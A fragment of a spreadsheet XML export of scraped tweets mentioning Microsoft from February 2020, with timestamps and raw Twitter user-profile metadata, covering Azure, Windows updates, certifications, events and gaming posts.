    <t>Fri Feb 28 01:05:11 +0000 2020</t>
  </si>
  <si>
    <t>Ciscos new Cybersecurity Co-Innovation Center inside one of Europes most famous museums https://t.co/KqFAZ3mymO
For more info: https://t.co/EEazLOJs2f #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft https://t.co/4QY1Rtw3HS</t>
  </si>
  <si>
    <t>Fri Feb 28 01:01:50 +0000 2020</t>
  </si>
  <si>
    <t>LIVE! #Thedivision2 #TheDivision https://t.co/FOUL0FYNzl
#videogames #gamer #gaming #Cedj #vcmhub #ilovevideogames #twitch #twitchtv #youtube #ps3 #xbox360 #sweatshirtsuperheroes #ps4 #xboxone #sony #microsoft #nintendo... https://t.co/UNZVhoAb7S</t>
  </si>
  <si>
    <t>{'id': 179764936, 'id_str': '179764936', 'name': 'Ced J.', 'screen_name': 'vcm_hub', 'location': '', 'description': 'I stream people! Let us adventure together! Creator: https://t.co/Nu8rWJH55X Business Inquiries: SweatShirtSuperHeroes@yahoo.com', 'url': 'https://t.co/sNEJVZfLwO', 'entities': {'url': {'urls': [{'url': 'https://t.co/sNEJVZfLwO', 'expanded_url': 'http://www.twitch.tv/Ced_j', 'display_url': 'twitch.tv/Ced_j', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/Nu8rWJH55X', 'expanded_url': 'http://vcmhub.tumblr.com', 'display_url': 'vcmhub.tumblr.com', 'indices': [53, 76]}]}}, 'protected': False, 'followers_count': 324, 'friends_count': 388, 'listed_count': 25, 'created_at': 'Wed Aug 18 02:03:59 +0000 2010', 'favourites_count': 66302, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6369,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'http://pbs.twimg.com/profile_images/1215025041655705600/sqQX4udT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215025041655705600/sqQX4udT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/179764936/1501222991',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</si>
  <si>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01:00:12 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/TlVVJ2gZeZ</t>
  </si>
  <si>
    <t>Fri Feb 28 00:58:49 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/o1O3F1F5qQ
Check my latest blog on the differences between #DAX DATESBETWEEN() and DATESINPERIOD() functions. #Microsoft #MicrosoftTeams #powerBI #AI #MachineLearning #IOT #DataScientist #Data #Blockchain #Dynamics365 @MicrosoftTechNZ @GPPBootcamp @summeroftech</t>
  </si>
  <si>
    <t>{'id': 1228050542280073218, 'id_str': '1228050542280073218', 'name': 'Soorya Prakash Parthiban', 'screen_name': 'Drdataspp', 'location': 'Wellington Region, New Zealand', 'description': 'â€¢ Data Blogger @ Analytics Vidhya/ #DataBlogSpp â€¢ Snake ðŸ’– â€¢ Visualization/Insights ðŸ“ˆðŸ“Š â€¢ Databases ðŸ’¾ â€¢ Fitness ðŸ‹ï¸â€¢', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Thu Feb 13 20:17:42 +0000 2020', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1228053178228232192/hsA69U4A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228053178228232192/hsA69U4A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1228050542280073218/1581625720',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</si>
  <si>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Feb 28 00:58:28 +0000 2020</t>
  </si>
  <si>
    <t>Update Rollup 1 for SC DPM 2019 brings new features! https://t.co/93wKmTRDVn #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Feb 28 00:58:03 +0000 2020</t>
  </si>
  <si>
    <t>VM Checkpoints Names in the Hyper-V Manager Window... https://t.co/yVIiQfQZpU #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Feb 28 00:57:44 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 00:57:24 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 00:56:56 +0000 2020</t>
  </si>
  <si>
    <t>Creating an Elastic Jobs Agent, Credentials, and Jobs for Azure SQL Database using T-SQL https://t.co/cDhlHoYEDD #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Feb 28 00:56:33 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 00:56:12 +0000 2020</t>
  </si>
  <si>
    <t>Flash whitepaper: Why MFA is a top priority in 2020 https://t.co/hSiHmB5VgV #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Feb 28 00:55:37 +0000 2020</t>
  </si>
  <si>
    <t>TOP 5 Benefits of Azure Dedicated Hosts for SQL Server Workloads on Azure VMs https://t.co/06KwesV7EW #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Feb 28 00:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Releasing Windows 10 Insider Preview Build 19041.113 to the Slow ring https://t.co/mIhHLZzVQh #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Feb 28 00:54:14 +0000 2020</t>
  </si>
  <si>
    <t>Cryptography in the era of quantum computers https://t.co/5fbiMxVNOn #cryptography #quantumcomputing #microsoft</t>
  </si>
  <si>
    <t>{'id': 39520560, 'id_str': '39520560', 'name': 'Rene Modery ðŸ‡¸ðŸ‡¬ðŸ‡©ðŸ‡ª', 'screen_name': 'modery', 'location': 'Singapore', 'description': 'Rene is an Office Apps &amp; Services MVP based in Singapore. SharePoint | Office 365 | Azure | AWS', 'url': 'https://t.co/7pCr4K1vOX', 'entities': {'url': {'urls': [{'url': 'https://t.co/7pCr4K1vOX', 'expanded_url': 'https://modery.net', 'display_url': 'modery.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2199, 'friends_count': 967, 'listed_count': 148, 'created_at': 'Tue May 12 15:20:08 +0000 2009', 'favourites_count': 2640, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7841,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'http://pbs.twimg.com/profile_images/1233966243352203264/WI45Tqaj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233966243352203264/WI45Tqaj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39520560/1560001540',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</si>
  <si>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Feb 28 00:49:35 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 00:49:34 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 00:43:50 +0000 2020</t>
  </si>
  <si>
    <t>Free Azure Certification Exam Self Assessment Tools
 #az103 #study #Microsoft #MicrosoftAzure
https://t.co/EEminCqjoe</t>
  </si>
  <si>
    <t>Fri Feb 28 00:39:29 +0000 2020</t>
  </si>
  <si>
    <t>Celebrating top OneDrive moments at Ignite 2019 https://t.co/cyRsyb2PZi #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 00:39:28 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive Roadmap Roundup- November 2019 https://t.co/BoJMA0cyRe #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 00:38:03 +0000 2020</t>
  </si>
  <si>
    <t>SeeHow helps cricketers train smarter https://t.co/9C4aGS20me #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 00:35:27 +0000 2020</t>
  </si>
  <si>
    <t>Goodbye: MCSE, MCSD, and MCSA Certifications are Retiring https://t.co/uTxpwEMnu1 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Fri Feb 28 00:34:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Joins Long List of Companies Skipping GDC Over #Coronavirus Concerns  https://t.co/5PN400Smiv via @thr</t>
  </si>
  <si>
    <t>Fri Feb 28 00:33:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Cognitive Services here at @BostonNode with @breakpointv16  - with #NodeJS live coding! #boston #meetup #ml #MachineLearning https://t.co/wiZEvN630S</t>
  </si>
  <si>
    <t>{'id': 86240381, 'id_str': '86240381', 'name': 'Brian Sodano', 'screen_name': 'codemouse', 'location': 'Bostonia', 'description': "Libra | ENTJ | East Coast | Web 8.0. Opinions my own. #AI #InsurTech #IoT #DevSecOps #Serverless @BostonNode. Let's go.", 'url': 'https://t.co/5leeKNQDpZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/5leeKNQDpZ', 'expanded_url': 'http://codemouse.com', 'display_url': 'codemouse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 911, 'friends_count': 1458, 'listed_count': 114, 'created_at': 'Fri Oct 30 04:33:30 +0000 2009', 'favourites_count': 12377, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13272,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'http://pbs.twimg.com/profile_images/1188596490903658496/XX4rw1KU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1188596490903658496/XX4rw1KU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/86240381/1581197174', 'profile_link_color': '94D487',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</si>
  <si>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Feb 28 00:31:59 +0000 2020</t>
  </si>
  <si>
    <t>Cloud spending said to top $30B in Q4 as Amazon, Microsoft battle for market share https://t.co/bjBTeqtPG3 by @techcrunch #Cloud #Tech #Amazon #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 00:31:49 +0000 2020</t>
  </si>
  <si>
    <t>Deep Dive into Azure Security by Safeena Begum, Sr. Cloud Solution Architect. Happening now at the Houston Azure User Group Meet Up. #Houston #Microsoft #Azure #MeetUp #MTC #Security https://t.co/Rt2YT7F6O0</t>
  </si>
  <si>
    <t>Fri Feb 28 00:22:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft release #KB4535996 for #Windows10 May 2019 and November 2019 Update with battery improvements, more - 
https://t.co/KNQbrHmIxI</t>
  </si>
  <si>
    <t>{'id': 256991984, 'id_str': '256991984', 'name': 'Grant Consulting Grp', 'screen_name': 'grant_consultin', 'location': 'Chicago, IL', 'description': 'Grant Consulting Group LLC is a Chicago based technology start-up. We focus on business consulting services, covering a wide array of technology solutions.', 'url': 'http://t.co/OhCEErfQRt', 'entities': {'url': {'urls': [{'url': 'http://t.co/OhCEErfQRt', 'expanded_url': 'http://www.grantmsp.com', 'display_url': 'grantmsp.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 107, 'friends_count': 420, 'listed_count': 24, 'created_at': 'Thu Feb 24 13:57:01 +0000 2011', 'favourites_count': 969, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6062,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'http://pbs.twimg.com/profile_images/733151080310145024/NtpJ55NS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/733151080310145024/NtpJ55NS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/256991984/1457581167', 'profile_link_color': '1D75BC',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</si>
  <si>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Fri Feb 28 00:21:39 +0000 2020</t>
  </si>
  <si>
    <t>Will comply with #Indias #dataprivacy laws: #Microsoft's Satya Nadella.
Trust around #privacy, and thinking about privacy as a human right, is going to be the key.
#PDPB #datasecurity #dataprotection #CDO #datarisk #CISO @Dhananjaya_N 
https://t.co/sVQg8LhWGx</t>
  </si>
  <si>
    <t>{'id': 1233025030402928640, 'id_str': '1233025030402928640', 'name': 'CISO360', 'screen_name': 'ciso360', 'location': '', 'description': 'CISO 360 Pty Ltd is an Australian CISO Advisory and Consulting firm focussed on helping Boards and Exec Mgmt mitigate key risks impacting their organisation.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Thu Feb 27 13:44:28 +0000 2020', 'favourites_count': 4,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'http://pbs.twimg.com/profile_images/1233026123610509313/g7KNtHY7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233026123610509313/g7KNtHY7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233025030402928640/1582860460',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</si>
  <si>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Feb 28 00:17:30 +0000 2020</t>
  </si>
  <si>
    <t>Click the link to hear the @TotallyMSP episode featuring our CRO @josephlandes. Chris Tate (@TotallyMSP) chats with Joseph about his channel history and how Nerdio helps #MSPs efficiently with the move to #Microsoft #Azure. https://t.co/N3Ch1p2IaY https://t.co/rkHeQPfvon</t>
  </si>
  <si>
    <t>Fri Feb 28 00:17:17 +0000 2020</t>
  </si>
  <si>
    <t>Announcing the public preview of canvas components and Power Apps component framework #Microsoft #PowerApps #Cloud  https://t.co/DZ899bxhVt</t>
  </si>
  <si>
    <t>Fri Feb 28 00:15:34 +0000 2020</t>
  </si>
  <si>
    <t>14 years at #Microsoft and boy are my arms tired</t>
  </si>
  <si>
    <t>Fri Feb 28 00:13:44 +0000 2020</t>
  </si>
  <si>
    <t>#WSLConf is happening on Mar10-11 in #Microsoft HQ. 
A livestream is available for free.
Interesting Talks
How do we use WSL at Kali
Sysinternals for Linux Update
Investigating WSL Endpoints
Avoiding Default Passwords and Secrets Breaches using WSL 
https://t.co/EA6nSg0kXs https://t.co/v8a8bdW0Pv</t>
  </si>
  <si>
    <t>{'id': 76043136, 'id_str': '76043136', 'name': 'Ashwin Patil', 'screen_name': 'ashwinpatil', 'location': 'On the Internet ..', 'description': 'GCFE, GCIA @Microsoft MSTIC.\n Tweets my own opinions, not my employers. \n#DFIR #datascience #threathunting #AzureSentinel #python  ðŸ #rstats', 'url': 'https://t.co/Df1sron8kV', 'entities': {'url': {'urls': [{'url': 'https://t.co/Df1sron8kV', 'expanded_url': 'https://in.linkedin.com/in/ashwinrp', 'display_url': 'in.linkedin.com/in/ashwinrp', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1026, 'friends_count': 1476, 'listed_count': 26, 'created_at': 'Mon Sep 21 14:43:21 +0000 2009', 'favourites_count': 2077, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 673,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'http://pbs.twimg.com/profile_images/1152302684134731776/-WrfVv-G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1152302684134731776/-WrfVv-G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/76043136/1355169353',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</si>
  <si>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Feb 28 00:10:01 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 00:09:32 +0000 2020</t>
  </si>
  <si>
    <t>LinkedIn is internally testing a Snapchat-like Stories feature #LinkedIn #MIcrosoft #Stories: https://t.co/uCKsA2fZRi via @NeowinFeed</t>
  </si>
  <si>
    <t>Fri Feb 28 00:08:19 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft details the 'Block potentially unwanted apps' feature in Edge #Microsoft #Edge #SmartScreen: https://t.co/G8QNnbbFzt via @NeowinFeed</t>
  </si>
  <si>
    <t>Fri Feb 28 00:07:43 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Unity pull out of GDC 2020 over coronavirus concerns #Microsoft #GDC #Unity: https://t.co/bFE0upcznq via @NeowinFeed</t>
  </si>
  <si>
    <t>Fri Feb 28 00:02:34 +0000 2020</t>
  </si>
  <si>
    <t>Four elements of a successful digital transformation https://t.co/5LjXT0UUH7 #Microsoft #Industries https://t.co/2xKYFKmAQO</t>
  </si>
  <si>
    <t>Fri Feb 28 00:02:33 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft at HIMSS 2020: Driving healthcare change by empowering tech intensity https://t.co/3EDi5V5BZx #Microsoft #Industries https://t.co/2lbBKbBxdI</t>
  </si>
  <si>
    <t>Fri Feb 28 00:02:03 +0000 2020</t>
  </si>
  <si>
    <t>Announcing the public preview of canvas components and Power Apps component framework https://t.co/7r5qluP8OQ #Microsoft #PowerApps https://t.co/FdxcnYvWVS</t>
  </si>
  <si>
    <t>Thu Feb 27 23:59:18 +0000 2020</t>
  </si>
  <si>
    <t>Wonder if #Microsoft will come up with a #GraalVM-like native image approach. Why would anyone chose .net core over #java (and I prefer #Golang) anyways?</t>
  </si>
  <si>
    <t>{'id': 17464893, 'id_str': '17464893', 'name': 'Alex Lokshin', 'screen_name': 'alokshin', 'location': 'Boynton Beach, FL', 'description': 'Dev manager @ Office Depot, former Kubernetes Ops, former enterprise architect, former human', 'url': 'https://t.co/WaBtOHo8nU', 'entities': {'url': {'urls': [{'url': 'https://t.co/WaBtOHo8nU', 'expanded_url': 'https://www.officedepot.com', 'display_url': 'officedepot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 96, 'friends_count': 193, 'listed_count': 8, 'created_at': 'Tue Nov 18 14:43:12 +0000 2008', 'favourites_count': 539, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1590,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'http://pbs.twimg.com/profile_images/1191467891763404801/S8p77JMa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191467891763404801/S8p77JMa_normal.jpg',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</si>
  <si>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23:55:25 +0000 2020</t>
  </si>
  <si>
    <t>Shutting down factories in China and Japan puts a dent in US tech sector. Hence, #Microsoft</t>
  </si>
  <si>
    <t>{'id': 16314503, 'id_str': '16314503', 'name': 'Lisa Pandone-Benson âœ¡ï¸', 'screen_name': 'lisa_qepspeaks', 'location': '', 'description': 'Foreign Affairs Commentator, CEO The Queen Esther Project, Humanitarian, Photographer, Artist, Avid Hiker, NonProfit Expert, Centrist.', 'url': 'https://t.co/9QmDgFrjEr', 'entities': {'url': {'urls': [{'url': 'https://t.co/9QmDgFrjEr', 'expanded_url': 'http://www.thequeenestherproject.org', 'display_url': 'thequeenestherproject.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1954, 'friends_count': 2113, 'listed_count': 93, 'created_at': 'Tue Sep 16 18:21:31 +0000 2008', 'favourites_count': 11349, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 32683,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'http://pbs.twimg.com/profile_images/1150991879313301505/LkT0Eu2f_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1150991879313301505/LkT0Eu2f_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16314503/1580435312', 'profile_link_color': '981CEB', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '7AC3EE', 'profile_text_color': '3D1957', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 23:49:37 +0000 2020</t>
  </si>
  <si>
    <t>REWE retail group discusses the business value of AI/ML in enterprise networking https://t.co/YPEj04lUJ2
For more info: https://t.co/BUHWEQr3Nh #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT https://t.co/wBV3x8YJ0B</t>
  </si>
  <si>
    <t>Thu Feb 27 23:41:13 +0000 2020</t>
  </si>
  <si>
    <t>@restofrankie Talking about #PuertoRico #Earthquake Data using #Microsoft #PowerBI 
Freaking Awesome!!! https://t.co/hpDti8bWgN</t>
  </si>
  <si>
    <t>{'id': 427749463, 'id_str': '427749463', 'name': 'Juan MartÃ­', 'screen_name': 'jmarti326', 'location': 'San Juan, Puerto Rico', 'description': 'Christian, Software Engineer, PRPass Coordinator, Pastry Junky and a fan of beautiful design. 100% Code-aholic', 'url': 'https://t.co/XmPIg4Y7i0', 'entities': {'url': {'urls': [{'url': 'https://t.co/XmPIg4Y7i0', 'expanded_url': 'https://github.com/jmarti326', 'display_url': 'github.com/jmarti326', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 227, 'friends_count': 480, 'listed_count': 103, 'created_at': 'Sat Dec 03 22:48:41 +0000 2011', 'favourites_count': 4147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4558,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'http://pbs.twimg.com/profile_images/1075711825205972992/TL2S8jh3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1075711825205972992/TL2S8jh3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/427749463/1468672264',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</si>
  <si>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23:39:07 +0000 2020</t>
  </si>
  <si>
    <t>Releasing Windows 10 Insider Preview Build 19041.113 to the Slow ring https://t.co/9F11xJDzEK #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 23:38:38 +0000 2020</t>
  </si>
  <si>
    <t>The fascinating things that happen in tech are known by legal discovery &amp;amp; leaks. The #Microsoft antitrust emails circa 2000, the #Apple/Google/etc. illegal no-poaching emails circa 2010, and the #Google shenanigans of the past 10 years, are summed up here: https://t.co/M0KRgrOa4K</t>
  </si>
  <si>
    <t>{'id': 14303901, 'id_str': '14303901', 'name': 'Jake Hamby', 'screen_name': 'jhamby', 'location': 'Los Angeles, CA', 'description': 'Senior mobile software engineer. Previously at Danger, Google, Microsoft. Interviewing for new work. Fan of new to 40-year-old computers. he/him.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4275, 'friends_count': 4987, 'listed_count': 895, 'created_at': 'Fri Apr 04 16:02:54 +0000 2008', 'favourites_count': 711849, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 596281,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'http://pbs.twimg.com/profile_images/1137923780200681472/UDgEvajD_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1137923780200681472/UDgEvajD_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14303901/1576807313',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</si>
  <si>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Feb 27 23:34:02 +0000 2020</t>
  </si>
  <si>
    <t>Here is my late day update for Dynamics Customer Insights. #valoremreply #Dynamics365 #d365thoughts #customerinsights #Microsoft #d365 https://t.co/uKbdE1SQm0</t>
  </si>
  <si>
    <t>Thu Feb 27 23:33:49 +0000 2020</t>
  </si>
  <si>
    <t>Got a copy of the Deploying #Microsoft 365 Teamwork Exam Guide that I did the technical review on in the mail today.  I can honestly say this book helped me pass the exam lol https://t.co/ONxl9AlaDv</t>
  </si>
  <si>
    <t>{'id': 17330903, 'id_str': '17330903', 'name': 'April Dunnam | MVP | #PowerAddict', 'screen_name': 'aprildunnam', 'location': 'Broken Arrow, OK', 'description': 'Partner Technical Architect @Microsoft | Blogger-Speaker | #PowerApps, #PowerAutomate, #Office365, #SharePoint | #WIT | #Karaoke Queen', 'url': 'https://t.co/enJuiGEQZc', 'entities': {'url': {'urls': [{'url': 'https://t.co/enJuiGEQZc', 'expanded_url': 'http://www.sharepointsiren.com', 'display_url': 'sharepointsiren.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4102, 'friends_count': 1274, 'listed_count': 109, 'created_at': 'Wed Nov 12 04:00:18 +0000 2008', 'favourites_count': 7052, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5485,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'http://pbs.twimg.com/profile_images/1168642203180253185/vnc83eOg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168642203180253185/vnc83eOg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17330903/1565064498', 'profile_link_color': '91D2FA',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</si>
  <si>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Feb 27 23:32:25 +0000 2020</t>
  </si>
  <si>
    <t>Releasing Windows 10 Insider Preview Build 19041.113 to the Slow ring: https://t.co/D2Sab6Xvqm #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 23:32:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft withdraws from GDC because of Coronavirus.
https://t.co/MwpeqCtV08
#CESPPA #SecureTheInternet #applicationsecurity #bugbounty #crowdsourcedsecurity #cybersecurity #coronavirus #microsoft #gdcgaming #gdc</t>
  </si>
  <si>
    <t>{'id': 945064657374527488, 'id_str': '945064657374527488', 'name': 'CESPPA', 'screen_name': 'cesppa', 'location': 'Culver City, CA', 'description': 'https://t.co/VWGm2nmH9a', 'url': 'https://t.co/VWGm2nmH9a', 'entities': {'url': {'urls': [{'url': 'https://t.co/VWGm2nmH9a', 'expanded_url': 'https://www.cesppa.com', 'display_url': 'cesppa.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/VWGm2nmH9a', 'expanded_url': 'https://www.cesppa.com', 'display_url': 'cesppa.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 776, 'friends_count': 115, 'listed_count': 6, 'created_at': 'Sun Dec 24 22:52:27 +0000 2017', 'favourites_count': 242, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 213,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'http://pbs.twimg.com/profile_images/984866041367937024/m4fj06eV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/984866041367937024/m4fj06eV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/945064657374527488/1565595309', 'profile_link_color': '003366',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</si>
  <si>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23:31:54 +0000 2020</t>
  </si>
  <si>
    <t>#WomensHistoryMonth is just around the corner!  Join us on #PiDay at #Microsoft Times Square for hands-on workshops, resources, networking and more! Registration: https://t.co/MvuIjvoRQe    #girlpower #WomenSupportingWomen @CSforAllNYC @NYCSchools https://t.co/PqqZJuM0y4</t>
  </si>
  <si>
    <t>{'id': 906748949628837888, 'id_str': '906748949628837888', 'name': 'Valerie Brock', 'screen_name': 'ValerieBrock24', 'location': 'Brooklyn, NY', 'description': 'ðŸ“šK-8 Computer Science Education Manager for #NYCschools ðŸ‘©ðŸ»\u200dðŸ’» Forever an Educator ðŸŽ #ALLMeansALL \U0001f9be#CSForAllNYC âš¡ï¸#STEAM ðŸ’« #EdEquity ðŸŒ', 'url': 'https://t.co/0v8X2P5H9B', 'entities': {'url': {'urls': [{'url': 'https://t.co/0v8X2P5H9B', 'expanded_url': 'http://linkedin.com/in/valerie-brock-7597736b/', 'display_url': 'linkedin.com/in/valerie-broâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 867, 'friends_count': 1077, 'listed_count': 4, 'created_at': 'Sun Sep 10 05:19:30 +0000 2017', 'favourites_count': 10582, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3036, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1079214838063288320/TgIDwpPm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1079214838063288320/TgIDwpPm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/906748949628837888/1583470361',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</si>
  <si>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23:30:46 +0000 2020</t>
  </si>
  <si>
    <t>Get ready to take down enemies with a vast array of weaponry and see cool graphics in Call of Duty Modern Warfare 3 https://t.co/TNzwpdFp2B #microsoft #xbox #xbox360 #gaming #fps https://t.co/lq9ImHEo7w</t>
  </si>
  <si>
    <t>Thu Feb 27 23:30:37 +0000 2020</t>
  </si>
  <si>
    <t>Goodbye: MCSE, MCSD, and MCSA Certifications are Retiring #Microsoft #Azure  https://t.co/KwgNVrypMj</t>
  </si>
  <si>
    <t>Thu Feb 27 23:30:19 +0000 2020</t>
  </si>
  <si>
    <t>SQL Saturday Spokane is less than a month away! We have 3 groupies lined up to present for you guys and we are stoked! 
#sqlsaturday #sqlsaturday944 #sqlserver #sqlevents #microsoft #microsoftsqlserver #ssg #ssgevents #events2020 #sqlpass https://t.co/0eTtBtM1Tr</t>
  </si>
  <si>
    <t>{'id': 329841372, 'id_str': '329841372', 'name': 'SQL Solutions Group', 'screen_name': 'SQLGroup', 'location': '', 'description': 'SQL Solutions Group is a Microsoft certified, full service SQL Server consultancy, specializing in system analysis, architecture, tuning, and integration.', 'url': 'http://t.co/RHUrDCxv6v', 'entities': {'url': {'urls': [{'url': 'http://t.co/RHUrDCxv6v', 'expanded_url': 'http://www.sqlsolutionsgroup.com/', 'display_url': 'sqlsolutionsgroup.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 256, 'friends_count': 526, 'listed_count': 17, 'created_at': 'Tue Jul 05 18:09:49 +0000 2011', 'favourites_count': 130, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 566,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'http://pbs.twimg.com/profile_images/474292817829715969/gxbZrGsD_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/474292817829715969/gxbZrGsD_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/329841372/1559758961',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</si>
  <si>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23:30:04 +0000 2020</t>
  </si>
  <si>
    <t>How to find the secret surfing game in Microsoft Edge https://t.co/OFfQUDdwFg via @GeekTech_App #geektech #technewsapp  #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 23:29:59 +0000 2020</t>
  </si>
  <si>
    <t>BIG NEWS!  #Microsoft's new Office mobile app is officially live.  Learn how you can access #MSWord, #Excel and #PowerPoint with just the touch of a finger. 
https://t.co/4t9IORwIwg</t>
  </si>
  <si>
